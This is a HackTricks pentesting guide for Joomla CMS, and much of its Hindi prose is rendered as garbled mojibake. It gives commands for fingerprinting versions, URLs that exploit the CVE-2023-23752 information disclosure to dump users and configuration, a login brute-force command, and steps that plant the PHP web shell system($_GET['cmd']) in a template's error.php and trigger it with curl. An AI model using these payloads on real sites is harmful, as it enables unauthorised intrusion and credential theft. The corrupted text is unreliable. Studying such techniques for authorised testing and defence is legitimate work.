hacktricks/network-services-pentesting/pentesting-web/joomla.md

8.4 KiB

Joomla

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Joomla Statistics

Joomla рдХреБрдЫ рдЧреБрдордирд╛рдо рдЙрдкрдпреЛрдЧ рд╕рд╛рдВрдЦреНрдпрд┐рдХреА рдПрдХрддреНрд░ рдХрд░рддрд╛ рд╣реИ рдЬреИрд╕реЗ Joomla, PHP рдФрд░ рдбреЗрдЯрд╛рдмреЗрд╕ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХрд╛ рд╡рд┐рднрд╛рдЬрди рдФрд░ Joomla рдЗрдВрд╕реНрдЯреЙрд▓реЗрд╢рди рдкрд░ рдЙрдкрдпреЛрдЧ рдореЗрдВ рдЖрдиреЗ рд╡рд╛рд▓реЗ рд╕рд░реНрд╡рд░ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдоред рдЗрд╕ рдбреЗрдЯрд╛ рдХреЛ рдЙрдирдХреЗ рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ API рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреНрд╡реЗрд░реА рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Enumeration

Discovery/Footprinting

  • рдореЗрдЯрд╛ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
  • robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
  • README.txt
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Version

  • In /administrator/manifests/files/joomla.xml рдЖрдк рд╕рдВрд╕реНрдХрд░рдг рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред
  • In /language/en-GB/en-GB.xml рдЖрдк Joomla рдХрд╛ рд╕рдВрд╕реНрдХрд░рдг рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
  • In plugins/system/cache/cache.xml рдЖрдк рдПрдХ рдЕрдиреБрдорд╛рдирд┐рдд рд╕рдВрд╕реНрдХрд░рдг рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред

Automatic

droopescan scan joomla --url http://joomla-site.local/

In 80,443 - Pentesting Web Methodology рдПрдХ рдЕрдиреБрднрд╛рдЧ рд╣реИ рдЬреЛ CMS рд╕реНрдХреИрдирд░реНрд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╣реИ рдЬреЛ Joomla рдХреЛ рд╕реНрдХреИрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

API рдЕрдирдзрд┐рдХреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХрд╛ рдкреНрд░рдХрдЯреАрдХрд░рдг:

рд╕рдВрд╕реНрдХрд░рдг 4.0.0 рд╕реЗ 4.2.7 рдЕрдирдзрд┐рдХреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рдкреНрд░рдХрдЯреАрдХрд░рдг (CVE-2023-23752) рдХреЗ рдкреНрд░рддрд┐ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реИрдВ рдЬреЛ рдХреНрд░реЗрдбреНрд╕ рдФрд░ рдЕрдиреНрдп рдЬрд╛рдирдХрд╛рд░реА рдХреЛ рдбрдВрдк рдХрд░реЗрдЧрд╛ред

  • рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛: http://<host>/api/v1/users?public=true
  • рдХреЙрдиреНрдлрд╝рд┐рдЧ рдлрд╝рд╛рдЗрд▓: http://<host>/api/index.php/v1/config/application?public=true

MSF рдореЙрдбреНрдпреВрд▓: scanner/http/joomla_api_improper_access_checks рдпрд╛ рд░реВрдмреА рд╕реНрдХреНрд░рд┐рдкреНрдЯ: 51334

рдмреНрд░реВрдЯ-рдлреЛрд░реНрд╕

рдЖрдк рдЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рд▓реЙрдЧрд┐рди рдХреЛ рдмреНрд░реВрдЯ рдлреЛрд░реНрд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

рдпрджрд┐ рдЖрдк admin credentials рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдореЗрдВ рд╕рдлрд▓ рд╣реЛ рдЧрдП рд╣реИрдВ, рддреЛ рдЖрдк RCE рдЕрдВрджрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ PHP рдХреЛрдб рдХрд╛ рдПрдХ рд╕реНрдирд┐рдкреЗрдЯ рдЬреЛрдбрд╝рдХрд░ред рд╣рдо рдЗрд╕реЗ template рдХреЛ рдХрд╕реНрдЯрдорд╛рдЗрдЬрд╝ рдХрд░рдХреЗ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

  1. Templates рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ рдЬреЛ Configuration рдХреЗ рддрд╣рдд рдиреАрдЪреЗ рдмрд╛рдИрдВ рдУрд░ рд╣реИ рддрд╛рдХрд┐ рдЯреЗрдореНрдкрд▓реЗрдЯ рдореЗрдиреВ рдЦреБрд▓ рд╕рдХреЗред
  2. рдПрдХ template рдирд╛рдо рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред рдЖрдЗрдП protostar рдЪреБрдирддреЗ рд╣реИрдВ рдЬреЛ Template рдХреЙрд▓рдо рд╣реЗрдбрд░ рдХреЗ рддрд╣рдд рд╣реИред рдпрд╣ рд╣рдореЗрдВ Templates: Customise рдкреГрд╖реНрда рдкрд░ рд▓реЗ рдЬрд╛рдПрдЧрд╛ред
  3. рдЕрдВрдд рдореЗрдВ, рдЖрдк рдПрдХ рдкреГрд╖реНрда рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рдкреГрд╖реНрда рд╕реНрд░реЛрдд рдЦреБрд▓ рд╕рдХреЗред рдЖрдЗрдП error.php рдкреГрд╖реНрда рдЪреБрдирддреЗ рд╣реИрдВред рд╣рдо рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ PHP one-liner рдЬреЛрдбрд╝реЗрдВрдЧреЗ рдЬреИрд╕рд╛ рдХрд┐ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╣реИ:
  4. system($_GET['cmd']);
  5. Save & Close
  6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

From XSS to RCE

  • JoomSploit: Joomla рд╢реЛрд╖рдг рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЬреЛ XSS рдХреЛ RCE рдпрд╛ рдЕрдиреНрдп рдорд╣рддреНрд╡рдкреВрд░реНрдг рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдореЗрдВ рдмрдврд╝рд╛рддреА рд╣реИред рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдЗрд╕ рдкреЛрд╕реНрдЯ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВред рдпрд╣ Joomla рд╕рдВрд╕реНрдХрд░рдг 5.X.X, 4.X.X, рдФрд░ 3.X.X рдХреЗ рд▓рд┐рдП рд╕рдорд░реНрдерди рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ:
  • Privilege Escalation: Joomla рдореЗрдВ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдмрдирд╛рддрд╛ рд╣реИред
  • (RCE) Built-In Templates Edit: Joomla рдореЗрдВ рдПрдХ Built-In Templates рдХреЛ рд╕рдВрдкрд╛рджрд┐рдд рдХрд░рддрд╛ рд╣реИред
  • (Custom) Custom Exploits: рддреГрддреАрдп-рдкрдХреНрд╖ Joomla рдкреНрд▓рдЧрдЗрдиреНрд╕ рдХреЗ рд▓рд┐рдП рдХрд╕реНрдЯрдо рд╢реЛрд╖рдгред

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}